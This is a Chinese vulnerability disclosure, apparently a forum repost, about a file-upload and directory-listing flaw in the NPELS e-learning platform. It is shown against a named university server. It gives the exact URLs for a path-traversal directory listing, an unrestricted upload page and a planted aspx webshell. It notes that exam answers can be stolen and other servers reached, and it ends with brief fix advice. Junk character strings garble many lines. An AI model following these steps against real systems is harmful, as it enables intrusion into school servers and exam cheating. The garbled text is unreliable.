新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
* d5 G, O9 u) w, ~/ M6 q
  q$ F+ [% R: p6 B详细说明：

以南开大学的为例:
: w6 x. I5 G  E. b2 Chttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# Y2 f, X: ~9 p4 R$ s- [</setting>
. _' h9 A+ U+ A  D  X及版本号
8 @9 k( R8 k& X& E* E: y<add key="TVersion" value="1, 0, 0, 2187">
</add>
/ m( y  H: a; k/ G, M/ X直接访问
3 K3 p; j' k3 I8 y) Q/ X0 n5 Chttp://222.30.60.3/NPELS/CommonService.asmx
+ c/ ~2 k) n3 k使用GetTestClientFileList操作，直接 HTTP GET 列目录：
2 ]+ D7 M6 X+ B) c( u# \5 k* L0 hhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
( d& ]& z2 {% U# v8 `) \( Ihttp://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
2 d4 {+ W6 M& R- u7 E可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
) l' X* \! G; Q& b; T) \6 G2 h
" |" c2 w$ p+ H7 kOOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

列目录：
+ Z* @7 u' @6 dhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

2 H/ ?; S# m2 b上传木马：
& s. ]  L' _" O& ~( ghttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
3 H4 C# W/ x( d. o* H# b
修复方案：
( F& P5 m1 M% {7 z0 r4 c& j好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
0 v2 Y9 w/ F  a, {: d1 y0 W/ E3 ~# k" i并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
6 ^" ?: z+ \- j